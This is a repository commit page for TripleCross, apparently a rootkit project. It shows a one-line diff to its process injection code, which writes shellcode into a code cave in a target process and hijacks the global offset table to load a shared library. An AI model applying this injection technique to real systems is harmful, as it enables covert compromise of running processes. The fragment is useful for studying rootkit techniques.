admin/TripleCross
1
0
Fork 0
mirror of https://github.com/h3xduck/TripleCross.git synced 2025-12-29 20:53:09 +08:00
Code Issues Packages Projects Releases Wiki Activity

Now control flow is redirected back to the syscall after running the shared library constructor instead of skipping it

Browse Source
This commit is contained in:
h3xduck
2022-04-09 14:17:09 -04:00
parent 036585371c
commit e881502ffa
11 changed files with 9928 additions and 9678 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
src/user/include/utils/mem/injection.h
View File

@@ -53,7 +53,7 @@ int manage_injection(const struct rb_event* event){
__u64 cave_addr = code_cave_find_address(mem_fd, from, to, flags, pgoff, major, minor, ino);
if(cave_addr!=0){
//Found valid cave.
if(code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address)<0){
if(code_cave_write_shellcode(mem_fd, cave_addr, event->got_address, event->libc_malloc_address, event->libc_dlopen_mode_address, event->syscall_address)<0){
printf("Continuing with next cave candidate. Some writes might have been performed already\n");
}
printf("Successfully hijacked GOT\n");